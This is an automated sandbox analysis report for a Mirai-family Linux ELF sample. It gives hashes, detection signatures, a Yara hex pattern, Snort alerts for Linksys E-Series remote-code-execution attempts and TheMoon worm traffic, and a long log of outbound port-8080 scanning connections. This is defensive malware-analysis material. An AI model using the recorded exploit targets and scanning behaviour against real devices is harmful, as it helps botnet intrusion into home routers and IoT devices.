Linux Analysis Report
ZhhHfkNewm.elf

Overview

General Information

Sample name: ZhhHfkNewm.elf
renamed because original name is a hash value
Original sample name: b757694e98b44b2a21e5654c92c98826.elf
Analysis ID: 1365724
MD5: b757694e98b44b2a21e5654c92c98826
SHA1: 9cb9a03cc21badd27f13ad7a09d44bb1bfb380a6
SHA256: ce192327b8b13edbe3fd6b37c42b16bb0dc59951379fc25b8f6d92ed64e8cc84
Tags: 32, elf, mirai, sparc
Infos:

Detection

Mirai
Score: 80
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Mirai
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1365724
Start date and time: 2023-12-21 18:40:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal80.troj.linELF@0/1@0/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: ZhhHfkNewm.elf
Command: /tmp/ZhhHfkNewm.elf
PID: 6206
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
love you ~jun0
Standard Error:
  • system is lnxubuntu20
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source | Rule | Description | Author | Strings
ZhhHfkNewm.elf | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security |
ZhhHfkNewm.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
ZhhHfkNewm.elf | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth | 0xc470:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A

Source | Rule | Description | Author | Strings
6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security |
6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmp | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth | 0xc470:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security |
6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
              Source Port:49678
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.24.24.1355136480802027153 12/21/23-18:41:18.928967
              SID:2027153
              Source Port:51364
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23180.81.166.1213502080802026102 12/21/23-18:41:17.989761
              SID:2026102
              Source Port:35020
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.24.24.1355136480802026102 12/21/23-18:41:18.928967
              SID:2026102
              Source Port:51364
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23166.253.31.1105539680802027153 12/21/23-18:42:21.664885
              SID:2027153
              Source Port:55396
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.229.49.1974094480802026102 12/21/23-18:42:47.393204
              SID:2026102
              Source Port:40944
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23211.250.133.424649880802027153 12/21/23-18:41:08.285336
              SID:2027153
              Source Port:46498
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.229.49.1974094480802027153 12/21/23-18:42:47.393204
              SID:2027153
              Source Port:40944
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23203.234.50.1555502880802027153 12/21/23-18:41:08.603702
              SID:2027153
              Source Port:55028
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23211.250.133.424649880802026102 12/21/23-18:41:08.285336
              SID:2026102
              Source Port:46498
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.70.52.2374833880802027153 12/21/23-18:40:59.797048
              SID:2027153
              Source Port:48338
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.3.116.233540080802018132 12/21/23-18:42:21.544385
              SID:2018132
              Source Port:35400
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23203.234.50.1555502880802026102 12/21/23-18:41:08.603702
              SID:2026102
              Source Port:55028
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.238.85.274991280802026102 12/21/23-18:41:18.805007
              SID:2026102
              Source Port:49912
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2373.171.251.1233788480802026102 12/21/23-18:41:45.423583
              SID:2026102
              Source Port:37884
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2378.108.218.754297480802026102 12/21/23-18:41:24.286519
              SID:2026102
              Source Port:42974
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.65.82.2505411680802018132 12/21/23-18:42:11.595980
              SID:2018132
              Source Port:54116
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2396.238.85.274991280802027153 12/21/23-18:41:18.805007
              SID:2027153
              Source Port:49912
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.96.234.1893363080802018132 12/21/23-18:41:46.750765
              SID:2018132
              Source Port:33630
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.206.34.2374960080802026102 12/21/23-18:41:17.810451
              SID:2026102
              Source Port:49600
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.172.33.1943932280802018132 12/21/23-18:41:31.514403
              SID:2018132
              Source Port:39322
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2373.171.251.1233788480802027153 12/21/23-18:41:45.423583
              SID:2027153
              Source Port:37884
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.70.52.2374833880802026102 12/21/23-18:40:59.797048
              SID:2026102
              Source Port:48338
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain


              AV Detection

              Source: ZhhHfkNewm.elf, Avira: detected

              Networking

              Source: Traffic, Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44956 -> 198.41.207.56:8080
              Source: Traffic, Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44956 -> 198.41.207.56:8080
              Source: Traffic, Snort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:44956 -> 198.41.207.56:8080
              Source: Traffic, Snort IDS: 2842117 ETPRO WORM ELF/TheMoon.Linksys Worm Activity (Outbound) 192.168.2.23:36542 -> 104.24.78.255:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 157.241.185.181:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 90.131.152.166:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 80.225.153.232:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 107.249.227.137:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 155.97.7.237:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 147.53.82.107:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 47.43.29.171:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 123.27.114.201:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 173.72.120.242:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 60.189.172.218:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 24.35.14.42:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 188.191.113.88:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 1.139.163.238:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 163.108.113.245:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 203.7.101.127:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 115.64.235.239:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 143.54.143.195:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 188.122.69.74:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 175.248.83.42:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 166.252.161.118:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 167.104.26.233:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 171.214.72.88:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 88.26.200.68:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 63.11.179.209:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 211.30.37.82:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 169.219.214.143:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 167.184.245.39:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 119.215.127.13:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 134.77.87.31:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 81.20.177.70:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 92.218.80.233:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 19.123.116.147:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 2.234.87.146:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 77.166.248.182:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 57.147.184.18:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 117.113.136.58:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 132.171.254.45:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 167.1.140.106:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 41.57.159.173:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 191.194.151.2:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 98.101.126.164:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 147.189.156.113:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 210.187.67.111:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 19.154.40.30:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 178.161.19.91:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 197.49.6.160:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 134.9.101.105:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 199.86.5.45:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 109.229.231.90:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 120.199.130.52:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 151.134.194.28:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 177.205.105.50:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 75.247.46.213:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 65.10.222.250:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 163.65.97.107:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 110.103.249.149:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 159.131.82.171:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 31.111.142.143:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 191.228.156.244:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 57.116.66.76:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 118.14.205.225:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 221.167.108.78:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 8.79.47.243:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 17.229.201.132:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 217.238.179.181:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 8.88.227.35:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 44.161.33.103:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 109.5.186.239:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 142.135.20.132:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 121.162.251.139:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 86.173.7.99:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 179.1.57.5:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 179.46.60.239:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 180.78.99.77:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 187.80.229.67:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 189.243.146.233:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 57.110.233.42:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 90.186.79.114:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 213.164.64.217:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 138.30.21.65:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 97.176.6.255:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 102.198.131.9:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.47.79.165:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 116.24.182.82:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 12.229.236.189:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 218.149.121.170:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 71.94.113.87:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 102.118.87.23:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 45.212.15.76:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 194.67.248.100:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 108.9.52.78:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 182.154.76.167:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 9.212.234.117:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 27.56.169.188:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 124.91.235.80:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 142.0.164.214:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 48.242.95.139:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 46.121.225.64:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 182.88.8.212:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 180.67.154.205:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 83.22.80.120:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 68.59.208.22:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 138.46.161.55:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 198.57.63.164:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 47.99.174.199:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 39.199.158.39:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 130.7.173.185:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 213.67.76.57:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 133.126.110.149:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 159.7.161.120:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 63.109.108.136:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 132.107.189.118:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 191.188.47.184:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 191.137.108.153:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 141.209.54.33:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 72.202.65.59:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 180.204.66.163:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 1.20.126.186:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 70.122.32.207:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 174.82.25.23:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 18.160.216.176:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 151.213.137.33:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 119.24.252.104:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 67.183.61.70:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 2.183.135.98:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 4.34.167.134:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 210.132.202.152:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 17.250.49.159:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 86.123.20.84:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 68.23.151.196:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 164.36.173.164:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 87.115.192.7:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 147.197.60.243:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 116.73.243.80:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 121.88.177.204:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 143.140.252.18:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 126.180.99.74:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 41.225.181.250:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 104.170.69.221:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 84.120.95.221:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.18.34.2:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 118.123.148.23:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 153.169.245.171:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 105.152.134.91:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 74.102.210.63:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 120.191.111.154:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 194.130.214.16:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 219.98.209.23:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.221.135.93:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 163.183.206.102:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 90.142.225.5:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 185.90.222.154:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 132.134.12.226:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 129.112.233.233:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 128.177.210.136:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 199.187.5.32:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 169.99.63.52:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 17.240.141.160:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 17.217.141.252:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 98.68.201.77:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 71.41.149.250:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 135.195.217.146:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 86.255.44.181:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 81.64.189.55:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 199.95.237.189:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 125.6.142.81:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 133.165.226.204:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 20.220.4.193:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 99.88.47.141:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 175.19.137.221:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 183.6.117.110:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 144.201.178.180:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 138.140.177.51:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 130.95.69.23:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 120.54.241.208:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 24.43.225.21:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 70.94.65.250:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 62.133.14.15:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 47.140.158.30:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 87.221.233.18:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 17.42.24.202:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 84.2.124.78:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 111.47.94.223:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 36.79.222.221:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 63.250.8.201:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 62.84.116.97:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 35.152.124.20:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 137.104.145.125:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 151.130.194.203:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 20.160.81.66:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 71.78.108.123:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 159.212.87.130:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 101.253.15.18:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 205.150.105.47:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 136.59.6.13:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 145.251.101.79:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 17.169.37.107:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 194.54.32.78:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 133.72.62.233:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 142.12.137.224:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 200.180.208.82:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 52.144.148.197:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 120.36.32.65:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 95.84.63.156:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 151.46.24.195:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 187.201.121.3:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 52.177.70.71:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 43.103.24.159:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 59.245.157.9:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.169.155.222:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 204.242.15.183:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 173.142.166.168:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 125.170.50.223:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 163.235.125.177:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 50.23.71.205:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 77.156.192.229:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 158.92.202.78:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.170.227.179:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 76.166.198.160:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 174.121.103.8:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 89.16.112.128:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 27.64.192.203:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 210.195.188.87:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 206.11.189.235:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 128.58.112.187:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 83.101.62.169:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 103.116.245.198:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 120.173.154.37:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 136.182.234.61:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 85.240.94.56:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 173.144.72.149:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 219.50.6.76:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 213.11.9.249:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 115.205.135.184:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 40.29.38.21:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 163.177.193.193:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 43.16.234.50:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 95.119.43.127:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 95.16.197.181:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 60.13.182.249:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 155.143.239.57:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 155.139.211.239:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 219.195.122.17:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 157.98.137.84:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 164.47.10.193:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 51.200.24.185:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 196.33.178.79:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 170.133.58.240:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 184.144.116.110:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 174.104.134.226:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 111.14.129.0:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 79.253.12.101:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 211.244.229.170:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 114.41.127.107:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 67.213.128.187:8080
